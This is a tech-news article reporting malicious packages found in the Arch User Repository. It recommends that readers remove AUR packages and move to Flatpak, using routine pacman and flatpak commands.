Elyse Betters Picaro/ZDNET
Follow ZDNET: Add us as a preferred source on Google.
ZDNET’s key takeaways
- The Arch User Repository was found to contain malicious apps.
- Twice in a week’s span was this discovered.
- Users are warned to be vigilant, but there are other, easier ways.
Researchers at software supply chain management company Sonatype found that the Arch User Repository contained about 1,500 malicious packages, the company said in a blog post updated June 12.
“We continue to encourage all users of AUR packages to review all PKGBUILD and install script changes when updating, especially during this time. If you notice suspicious commits to a package that you use, please reach out to Arch staff via the aur-general mailing list with more information,” The Arch team said in a brief statement.
This does not bode well for a repository that was created to dramatically increase the amount of software available to Arch (and Arch derivative) users.
Also: Archcraft is a solid, super fast distro for anyone ready to move beyond beginner Linux
The AUR is essentially a way for developers to make new software available to users of Arch Linux before it is officially added to the Arch repositories. It’s a collection of package descriptions (named PDKGUILDs) that make it possible to compile a package from source code using the makepkg tool and then install the package via the Arch Linux package manager, pacman.
The thing about the AUR is that anyone can upload packages to it, and a group of Trusted Users is charged with keeping tabs on what goes in.
You can see where this is going, right?
Imagine you’re one of those volunteer Trusted Users charged with checking every app that is submitted to a repository. Now, imagine you’re a bad actor wanting to inject malware into that repository. You obfuscate the malware, submit the app as legit, and assume the Trusted Users won’t have time to dig through every line of your code. The Trusted User does a quick scan of your code and doesn’t see the obfuscation.
Blamo! You’ve just added a malicious app to the AUR.
Within the span of one week, roughly 1,500 malicious apps made their way into the repository, which means something has to change; otherwise, Arch (and Arch-based) users aren’t going to be able to trust the AUR. There have been no reports on what these malicious apps do, nor who submitted them.
Also: I’ve used Linux for 30 years – 4 frustrations remain, including 2 that push me back to MacOS
In the meantime, I have a few recommendations for Arch users.
Uninstall, uninstall, uninstall
First, you need to uninstall anything you’ve installed from the AUR, and hope that it’s not too late. At the moment, I have no idea how bad the malicious code is that made it into the AUR, so there’s no telling the damage it could have or did do to your system(s).
Fortunately, to remove the package, you can use pacman like so:
sudo pacman -R PACKAGENAME
Where PACKAGENAME is the package to be removed.
Once you’ve done that, check to ensure the package has been removed with the command:
pacman -Q
The above command will list every package installed on your system.
Stop using the AUR
Next, stop using the AUR, at least until the developers and Trusted Users can come up with a solution to avoid this problem. After taking care of that, consider the AUR off-limits until the developers have found a way to make it safe.
After you’ve removed all of the packages and stopped using the AUR, do yourself a favor and use a tool like Wireshark to test for any suspicious outgoing traffic. If you spot something you don’t recognize, look it up. If it’s unknown or known to be related to malicious code, either block the outgoing traffic or reinstall your OS.
Do not take any chances.
Adopt a universal package manager
In place of the AUR, install Flatpak and install apps from there. With Flatpak, you’ll have tons of applications to install, so you won’t miss the AUR nearly as much as you think. You can install Flatpak with the command:
sudo pacman -S flatpak
After installation, add the Flathub repository with:
flatpak remote-add –if-not-exists –user flathub https://dl.flathub.org/repo/flathub.flatpakrepo
You can then install anything you need, like so:
flatpak install PACKAGENAME
Where PACKAGENAME is the name of a package found on Flathub. You’ll find that there are apps on Flathub that weren’t available in the AUR (even proprietary apps like Spotify and Slack).
Also: After 30 years with Linux, I gave Windows 11 a chance – and found 9 clear problems
It’s a shame that bad actors can ruin something for everyone. While Arch Linux is a remarkably secure OS, the AUR is a different story. I’ve never been one to depend on the AUR (in fact, I rarely use it), so this doesn’t affect me nearly as much as it might affect those who do.
To fix this issue, I would suggest that the AUR needs a much better system for verifying the integrity of submitted software. I realize that some would consider that an affront to what the AUR has been for years, but if issues like this continue, the AUR will wind up becoming a barren wasteland.
Nearly 2,000 malicious apps within a week is nothing to look away from. And even if the devs can issue an all-clear every time malicious apps are discovered, at some point, no one is going to trust the AUR, so something dramatic has to change.
Even this Reddit thread from five years ago illustrates that this problem has been a concern for a long time. It also highlights the fact that the onus is on the user to check everything they install. To that, I would say, how are you going to attract new users if they are expected to inspect software they want to use for malicious code? The answer… You can’t.
